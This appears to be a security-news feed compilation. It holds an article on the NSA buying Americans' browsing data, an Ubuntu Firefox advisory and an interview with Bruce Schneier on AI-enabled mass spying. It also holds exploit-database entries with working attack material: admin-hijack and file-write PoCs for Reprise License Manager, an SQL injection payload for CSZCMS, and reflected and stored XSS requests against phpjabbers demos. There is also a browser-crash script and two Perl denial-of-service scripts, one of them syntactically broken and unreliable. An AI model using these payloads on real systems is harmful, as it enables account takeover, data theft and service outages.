By Deeba Ahmed
From Snowden to Shady Markets: The Long History of NSA's Unchecked Surveillance.
This is a post from HackRead.com Read the original post: NSA Admits Buying American Browsing Records From Shady Markets

According to a letter from NSA director Paul Nakasone to Wyden, the agency purchased Netflow data and information from electronic devices used both domestically and internationally.

The US National Security Agency (NSA) has confirmed purchasing American users’ internet browsing records without warrants, according to Oregon Democratic Senator Ron Wyden. Congressman Wyden, a staunch privacy advocate, spent three years attempting to disclose the NSA’s practice, including purchasing smartphone location data without a warrant.

These “warrantless purchases” included information about websites visited and apps used, explained Wyden. This means, that US government agencies frequently access commercial marketplaces to gather sensitive information about Americans without obtaining court warrants.

According to a letter from NSA director Paul Nakasone to Wyden, the agency only purchased Netflow data and information from electronic devices used both domestically and internationally. The data, mainly related to Internet communications, did not include American communications content. The NSA claims to use commercially available Netflow data for cybersecurity and foreign intelligence missions, to defend US military networks from foreign hackers, minimizing the collection of U.S. personal information through technical filters.

In a letter to the Director of National Intelligence (DNI), Avril Haines, Wyden has urged the Biden administration to stop this “warrantless surveillance of Americans” through internet data purchases. He argues that the US government should not fund and legitimize a shady industry, raising questions about its legality.

“The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans’ privacy are not just unethical, but illegal.”

Collecting user browsing habits metadata is a risky practice as it can expose personal information on websites related to mental health, sexual assault, domestic abuse, and telehealth, posing a significant privacy risk.

It must be noted that the Federal Trade Commission (FTC) has banned Outlogic (previously called X-Mode Social) and InMarket Media from selling location information without users’ informed consent, also barring Outlogic from collecting location data for sensitive locations like medical clinics and religious places.

Purchasing data from companies falling in the legal gray area is unethical as consumers/users are unaware of how it’ll be shared or used. Third-party apps incorporating SDKs from these brokers do not inform users about location data sales for advertising or national security purposes, either.

The revelation comes amid growing concerns about foreign governments acquiring US citizens’ data. The Biden administration is already preparing an executive order to curb such purchases, reports CNN. But the government itself is involved in such practices.

However, the NSA has a history of mass surveillance practices, therefore, Wyden’s disclosure doesn’t seem surprising. Back in 2015, a lawsuit was filed by Wikipedia against the NSA to protect the rights of its 500 million monthly users, arguing that their mass surveillance potentially violates the Fourth Amendment and First Amendment and that their activities exceed the authority granted by the Foreign Intelligence Surveillance Act.

Ex NSA contractor Edward Snowden’s 2013 revelation of a secret NSA mass surveillance program, which has been secret for over a decade created havoc globally, exposing the agency’s spying practices.

In 2015, a three-judge panel of the Second Circuit Court of Appeals ruled that the agency’s telephone metadata collection program, which gathered millions of American citizens’ phone records daily, is illegal under the Patriot Act.

****_RELATED ARTICLES_****

1.  **How Dutch Police Busted Hansa Dark Web Marketplace**
2.  **Snowden Explains Why Telegram Messenger App is Unsafe**
3.  **Prometei botnet uses NSA exploit, hits MS exchange servers**
4.  **Hacker uses NSA-reported Windows 10 vulnerability to troll NSA**
5.  **Baltimore City ransomware attack powered by stolen NSA hacking tool**

NSA Admits Buying American Browsing Records From Shady Markets

Ubuntu Security Notice 6610-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Cornel Ionce discovered that Firefox did not properly manage memory when opening the print preview dialog. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6610-1January 29, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-0741,CVE-2024-0742, CVE-2024-0743, CVE-2024-0744, CVE-2024-0745, CVE-2024-0747,CVE-2024-0748, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0754, CVE-2024-0755)Cornel Ionce discovered that Firefox did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         122.0+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6610-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0743, CVE-2024-0744,  CVE-2024-0745, CVE-2024-0746, CVE-2024-0747, CVE-2024-0748,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0754, CVE-2024-0755Package Information:  https://launchpad.net/ubuntu/+source/firefox/122.0+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6610-1

Reprise License Manager version 15.1 suffers from privilege escalation and arbitrary file write vulnerabilities.

    Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, CVE-2023-44031)Credit: Mohaiman Rahim/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-43183# Vulnerability Title: Incorrect Access Control (leading to PrivEsc)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows low level users, such as read-only users, to arbitrarily change the password of an admin and hijack their account.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "user" POST parameter at http://HOST:5054/change_password_process with the username of a target user (such as an Admin account).When executed this will result in the password of the targeted user being changed and the account therefore being compromised.////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-44031# Vulnerability Title: Incorrect Access Control (leading to arbitrary file write)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows a user to perform privileged web application functions, such as a function that generates system information.This vulnerability can be exploited to be able to change the path of where the diagnostics file should be saved via a crafted HTTP POST request.This can allow an attacker to save the diagnostics file, containing system information, in insecure locations.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "outputfile" POST parameter at http://HOST:5054/diagnostics_doit to an insecure path accessible by local users such as "C:\temp".Deloitte Disclaimer: Deloitte refers to a Deloitte member firm, one of its related entities, or Deloitte Touche Tohmatsu Limited ("DTTL"). Each Deloitte member firm is a separate legal entity and a member of DTTL. DTTL does not provide services to clients. Please see www.deloitte.com/about to learn more. Deloitte Statsautoriseret Revisionspartnerselskab, CVR-nr. 33 96 35 56 This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message and are hereby notified that any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited.

Reprise License Manager 15.1 Privilege Escalation / File Write

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

Senior Privacy Advocate David Ruiz speaks with Bruce Schneier about artificial intelligence, surveillance, and an era of "mass spying."

For decades, governments and companies have surveilled the conversations, movements, and behavior of the public.

And then the internet came along and made that a whole lot easier.  

Today, search engines collect our queries, browsers collect our device information, smartphones collect out locations, social media platforms collect our conversations with one another, and, depending on the country, governments either collect that same information from the companies that maintain it, or they gather it directly themselves by monitoring their people.

That’s a lot of data that, until now, has been difficult to parse at scale.

But cryptographer and computer security professional Bruce Schneier believes that’s going to change, all because of the advent of artificial intelligence.

Already equipped with reams of data, governments and companies will now be able to ask AI models to make conclusions _from_ the data, Schneier said, supercharging the human work of inquiry with the limitless scale of AI.

“Spying is limited by the need for human labor,” Schneier wrote. “AI is about to change that.”

In January, Senior Privacy Advocate David Ruiz (and host of the Lock and Code podcast) spoke with Schneier about the future of AI-enabled mass spying—the implications, the responses from the public, and whether there’s any hope in dismantling a system so deeply embedded in the modern world.

Below is an edited transcript of their conversation.

**DAVID RUIZ**: We know that mass surveillance has this “Collect it all” mentality—of the NSA, obviously, but also from companies that gather clicks and shares and locations and app downloads and all of that.

What is the mass spying equivalent of that?

**BRUCE SCHNEIER**: So, it’s “Collect it all,” but it’s “Collect different things.”

Let’s step back here.

We kind of know what mass surveillance, mass spying looks like. It’s the kind of thing we saw in former East Germany, where like 10 percent of the population spied on 90 percent of the population. And it was incredibly manpower intensive.

Now, we moved into a world of automatic mass surveillance with the rise of the internet and the rise of cheap data storage and processing. This is maybe 20 years ago, when companies and the NSA start collecting mass surveillance data, and that is metadata—the kind of data that Snowden talked about—data about data. Data from your phone, from your browser, who you spoke to, where you went, what you spent money on, what websites you visited, that’s kind of mass surveillance data.

> Spying, the difference I’m making, is about conversations.

And while computers were easily able to interpret location data and data about who you spoke to—your email “from” and “to” lines—they weren’t able to interpret what you said.  Voice conversations, text conversations, email conversations, they could do keyword searches and if you think about, Chinese censorship is based pretty naively on keyword searches. \[For instance,\] you say the bad word, you get censored. That’s still very primitive.

Spying—listening in on a conversation, knowing what people are saying—required human beings, and there weren’t enough humans to listen to everything. So, you had this automatic surveillance: We can know where everybody is, that’s easy.  But knowing what everybody’s saying, we still couldn’t do—we didn’t have the people.

As AI becomes increasingly capable of understanding and even having conversations, it can start doing the role that people used to do and engage in this kind of spying at a mass level.

Now, the question you asked started me in this monologue is what did that look like? And the answer is: We have no idea.

We kind of know what East Germany looked like, former Soviet Union. We do know what some of these countries look like. But I don’t think it’s the same. It is not this kind of mass spying by corporations. Or by democratic governments. So, we don’t know. But it’s worth at least thinking about. 

**DAVID RUIZ**: When I was trying to answer my own question, I feel like one of the potential futures here is, instead of “Collect it all,” it’s this attempt at “Know it all.”

**BRUCE SCHNEIER**: It always was “Know it all,” but now it becomes more possible.

**DAVID RUIZ**: Yeah, and I was hypothesizing that there might be companies that say “We have created a package of questions that we use on AIs that we know and trust to discover these new insights,” and \[they\] sell these packages to companies that are trying to find out XYZ and ABC about their customers, or governments about their persons.

And that already sounds awful. It sounds both boring and dreadful, which is what I think surveillance is today—it is boring operationally in terms of \[how\] we don’t see data brokers. We don’t see what gets collected every single day behind the interface of the web. But it is used so much to power the direction of the web.

**BRUCE SCHNEIER**: And my guess is that’s right. And it’s not actually boring. Certainly, the companies wanted you to think that. It is very hidden. Data brokers spent a lot of effort making sure that there’s no visibility into their industry, so we don’t know the data being collected on us.

But remember, this is still all surveillance data. It’s not the contents of your phone calls, it’s the billing information. It’s who you called, what time, how long you spoke, that kind of information. Maybe the location of your two phones when you were talking. This brings it up to another level. 

**DAVID RUIZ**: You mentioned that this is the conversations—the content of communications. And I wanted to address that immediately because I think whenever spying is discussed, a lot of folks picture someone rifling through text messages or emails. And I think some people might balk at that. They might say and reject the premise based on things like “Oh, Apple can’t look at my iMessages, and Google said it wouldn’t advertise based on email content some years ago, and my phone provider, I don’t think, is recording my phone calls.”

So, my question after those kinds of claims, is: Is that too narrow a lens to understand this future of mass spying? What am I missing when I say those things to calm myself down?

**BRUCE SCHNEIER**: I think it’s all economics. Google did realize that eavesdropping on the contents of your Gmail wasn’t terribly useful. So, they didn’t do it. Of course, they made a virtue out of it. That stuff will change.

We’re already seeing \[the questions of\] “Is this company using your data to train their AI? Will it be used to influence how an AI interacts with you?”\[And\] already we can see that the tones of voice we use with these AI chatbots is mirrored. They say they’re not storing it and using it for training—we don’t know the answer.

As this stuff becomes more valuable, as companies see a business interest in using it, of course it’s going to be used. It’s not going to be a world where we \[can\] rely on the goodness of the hearts of for-profit corporations not to abuse our privacy.

So, it’s a matter of how cheap it is. It is going to become cheap for Google to eavesdrop on the contents of everyone’s email conversations, or for Zoom to eavesdrop on all meetings? They currently say they’re not \[monitoring meetings in\] their terms of service, they’ll probably \[receive\] push back if they change it—they were already pushed back because there was a thought that Zoom would be using your information to train an AI. \[It\] turned out to not be true, but there was a little panic there. But how long does that last? 

We saw this with Facebook and their surveillance over the years and decades.

They did a new thing, there was a pushback, there’s an outcry, and after a couple months, it was the new normal. So, I don’t know where this is going to go, but the tech is moving to the point where this stuff is possible and, in fact, easy. 

**DAVID RUIZ**: We talked about the business case for \[AI-enabled mass spying\] and I wanted to ask more broadly: Who will engage in AI mass spying?

**BRUCE SCHNEIER**: The answer is going to be everybody who can.

Who are the major players here? Certainly there are corporations who are doing it for manipulation purposes. Surveillance is the business model of the internet because advertising is the business model of the internet, and advertising is convincing you to do something that you might not have done otherwise.

So, this surveillance-based manipulation is the business model, and anything that gives a company an advantage, they’re going to do. We \[already\] saw that with personalized advertising \[which is\] based on characteristics that you might not be happy sharing.

So, companies will do that.

Now, in the West, we tend not to have governments do this on their own citizens—they rely on corporations. The US government doesn’t spy on us directly, they get the spying data from corporations who do that to everybody.

You go to other countries, more totalitarian countries, and governments do engage in surveillance and will engage in spying. Here, I’m thinking about China, but other countries as well. So, very much think of it in terms of power:

> Those that have the power will engage in the behaviors because it magnifies their power. There is no surprise. 

**DAVID RUIZ**: There’s a lot of times where we could think “Why would a company do this? Why would a government do this?” And there’s a lot of alleged reasons. The NSA will say that it collects as much data as possible for national security reasons, but they’ve been saying that for decades, and the national security reason seems to change every few years, right? There’s a, there’s a “national security risk du jour.”

And it’s much easier and simpler to think of it as those that have power hope to keep that power and amass more of it.

I wanted to separately ask: We talked about corporations. We talked about governments. What about people? I have access to AI tools in a way that I don’t have access to data collection regimes.

So, are people going to spy on people?

**BRUCE SCHNEIER**:  People are already spying on people. It’s more one-on-one. There’s an entire industry of super creepy spyware that is sold to people who want to spy on their wives and girlfriends. This is kind of a gross industry, but it exists and it is used in many countries.

So, yes. But here again, the power matters, and it’s generally the more powerful spying on the less powerful in a relationship. It’s generally the man spying on the woman because that’s the power imbalance.

When you think about bulk surveillance, it’s access to the data.

I really can’t spy on my neighborhood. Sure, I can set up a camera in front of my house and watch what’s going on in my street, but that’s all I could do. I don’t have the power to put cameras everywhere. I don’t have the power to get your email or your Zoom stream.

So, I think you are going to see some use of these technologies by people who are not traditionally powerful. But in general, like all these technologies, they benefit the powerful more than the less powerful.

**DAVID RUIZ**: We know that people act differently when they know they’re being surveilled—will that also apply to mass spying?

**BRUCE SCHNEIER**: Certainly, people in the United States have lived out of this kind of regime in post-9/11. Lots of Muslims lived in a world where they were being spied on a lot.

Lots of people—Jon Penney comes to mind, there are others—have researched how the feeling that you’re under constant surveillance—or spying, they’re both the same here—leads to self-censorship.

If you think you are being watched all the time, you behave differently. We do know that there’s an enormous chilling effect on how you behave, what you do, on your conformity. And if you think you’re being watched all the time, you tend to conform. You’re not going to do something different. You’re not going to stand out.

> This seems really bad for society because that’s how society innovates. A world where people don’t try new things is a world that stagnates.

To take an easy example, about 10 years ago, I forget the year, gay marriage became legal in the United States, in all 50 states. It became the law of the land and that change was the result of a multi-decade process. For a while it was illegal and immoral, then it was illegal and moral, and then it became legal and moral.  And in order for that to happen—in order for that whole progression—somebody way back in the beginning had to try gay sex once and say: “You know, that wasn’t so bad. That was kind of fun.”

And the reason they were able to do that is that they weren’t being watched. They could do it in the privacy of their own bedroom and no one could stop them.

If you live in a world where, whether it’s gay sex or marijuana or whatever it is that becomes the mainstream moral norm over several generations, if you can’t try it, if there can’t be a counterculture of doing it, it never will become the social norm. If everybody who tried pot in the ‘50s was immediately discovered and arrested, you’d never get to legalization. You never would get a generation of people that would say, “You know, that’s not that bad. Why are we criminalizing this kind of not harmful drug?”

**DAVID RUIZ**: On the current environment that we live in, where so much surveillance happens every day—again, both from corporations and from governments—it doesn’t seem like there’s any way to dismantle it. And it feels like the potential of mass spying to produce even deeper insights means that we’ve lost the battle on surveillance. Have we lost that battle?

**BRUCE SCHNEIER**: I never think it’s too late, and that kind of fatalism doesn’t make sense when you look at history. It’s like saying in the 1200s, “Well, we tried to fight against monarchy. I guess that didn’t work. It’s too late.” Or centuries later, “You know, we tried to fight against slavery, that didn’t work.” Or, “You know, we’ll never give women the vote. That ship has sailed.”

> We, as a species, regularly make our society more moral, more ethical, more egalitarian. It’s slow, it’s bursty, but decade over decade, century over century, we are improving.

So, no, I don’t think from now until the end of our species, the level of surveillance we see today cannot be rolled back. I think that is ridiculous.

We no longer send five-year-olds up chimneys to clean them. We don’t do that. We changed. We no longer allow companies to sell pajamas that catch on fire. We changed. We can do that here.

Like the other big things, like monarchy, like slavery, like the patriarchy, these things are going to be hard to dismantle, but they are dismantlable.

Near term, I think you’re right. Near term, both companies and governments are just punch-drunk on our data, and they’re not going to give it up. But long term, lots of things are possible and will happen. 

**DAVID RUIZ**: I mean this as a high compliment: You are the most optimistic guest we’ve had on the podcast.

**BRUCE SCHNEIER**: I’m near term pessimistic and long term optimistic. Near term, I think we’re screwed. The tech monopolies are so powerful, and we saw that with social media. Both Republicans and Democrats agreed—this never happened before—that Facebook was harming our society in different ways, but it’s harming society. \[They\] called Zuckerberg in, called the other companies in, yelled at them, \[said\] something must be done, and nothing was done.

That is sheer lobbying power right there in operation.

So, near term, I don’t see any solution, but our species has handled harder problems than this. This won’t be the one that stumps us.

**DAVID RUIZ**: What do we do at this point? 

**BRUCE SCHNEIER**: I want this to be a political issue. This stuff changes when it becomes an issue that voters care about. If there is a debate question on this, if this becomes something that politicians are asked about, then change will happen, right? If it isn’t, then it is really just the lobbyists that get to decide what happens.

“What should we do?” is agitate for change. Make this political, make this something that politicians can’t ignore.

Where change is happening is the EU. You have listeners in the EU, and they will know that things are happening there. Right now, Europe is the regulatory superpower on the planet. They are the jurisdiction where we got a comprehensive data privacy law, where they are passing an AI security law, stuff that you would never see in the United States.

So, look outside the US right now, but make this political. That’s how we’re going to make it better.

But we’re fighting uphill. It’s very hard in the United States to enact policies that the money doesn’t want. Money gets its way in in US policy. And the money wants this. 

**DAVID RUIZ**: And I think disentangling money from politics in the United States is a different \[conversation\], and unfortunately we don’t have the time for it.

**BRUCE SCHNEIER**: No, surely you can solve that in half an hour.

**DAVID RUIZ**: Actually, are you booked for the next half hour?

**BRUCE SCHNEIER**: If I was able to solve that, I would be not doing what I’m doing now, because, you’re right, that might not be the most important problem, but as Professor Larry Lessig said, it’s the first problem. It’s a problem we need to solve to solve every other problem.

 In conversation: Bruce Schneier on AI-powered mass spying 

Chrome version 121 suffers from a javascript fork malloc vulnerability that indicates memory corruption upon crash.

    Searching the web for `javascript fork malloc bomb` returns results,e.g. [here][1]: and [here][2]:We got a javascript fork malloc bomb which crashed Chrome 121 on linuxwith SIGILL and about one in five runs the virtual machine freezes.SIGILL almost always is a sign of memory corruption :)On android it crashes the current tab without explanation.Firefox 121 on linux also crashes the current tab.In all cases except the sporadic freezes, the browser remains functioning,not counting the crashed tab.The javscript code is simply simple:`setInterval("document.body.innerHTML += document.body.innerHTML ",1);`[Online demo][3]: In case someone wants to test it on other browsersor debug.The GNU/linux tests took about 1.5 minutes in a virtual machine with4GB RAM and single core.[1]: http://wiki.glitchdata.com/index.php/Examples_of_fork_bombs#JavaScript[2]: https://gist.github.com/betandr/f0cbbb663accc3a76c11cc7661711566#javascript[3]: https://www.guninski.com/fork1.html

Chrome 121 Javascript Fork Malloc Bomb

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

Xitami version 2.5b4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Xitami 2.5b4 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 29 january 2024  
# Vendor Homepage: https://imatix-legacy.github.io/xitami.com/  
# Download to demo: https://drive.google.com/file/d/1hOVDRvk0KlZbHM4HeNhvhlbETbmQVEsf/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Xitami 2.5b4   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=Sxe6HIhAl4A

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to webserver.  
#The following request sends a large amount of data to the webserver to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

    $exploit  = "A"*939;

if ($socket = IO::Socket::INET->new  
   (PeerAddr => $ip,  
   PeerPort => $port,   
   Proto => "TCP"))

       {   
    $header =  
    "GET / HTTP/1.1\r\n".  
    "Host: ".$target." \r\n".  
    "If-Modified-Since: AAAAAAAAAAAAA "." $exploit\r\n";

    print $socket $header."\r\n";  
    sleep(1);  
    close($socket);  
    }

else  
  {  
  print "[-] Connection to $target failed!\n";  
  } 

            print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

     _________  
    |         |  
    | Exploit |==( )    //////  
    |_________|   |||   | o o|                   
                    ||| ( c  )                  ____  
                     ||| \= /                  ||   \_  
                      ||||||                   ||     |  
                      ||||||                ...||__/|-"  
                      ||||||             __|________|__  
                        |||             |______________|  
                        |||             || ||      || ||  
                        |||             || ||      || ||  
      ------------|||-------------||-||------||-||-------  
                        |__>            || ||      || ||          

                              [+] Xitami 2.5b4 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Xitami 2.5b4 Denial Of Service

PSOProxy version 0.91 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSOProxy 0.91 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 28 january 2024  
# Vendor Homepage: https://sourceforge.net/projects/psoproxy/files/latest/download  
# Download to demo: https://drive.google.com/file/d/1O8Q2d0muet6XuOhqwXuvT3qfzgGNk6vs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSOProxy 0.91  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=ALe3uFS4cUA

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $i=0;  
    print "\t    ==> Exploiting... \n\n";

$socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "tcp")  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";

        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $target failed!\n";  
    exit;  
}

print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] PSOProxy 0.91 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Tag

#web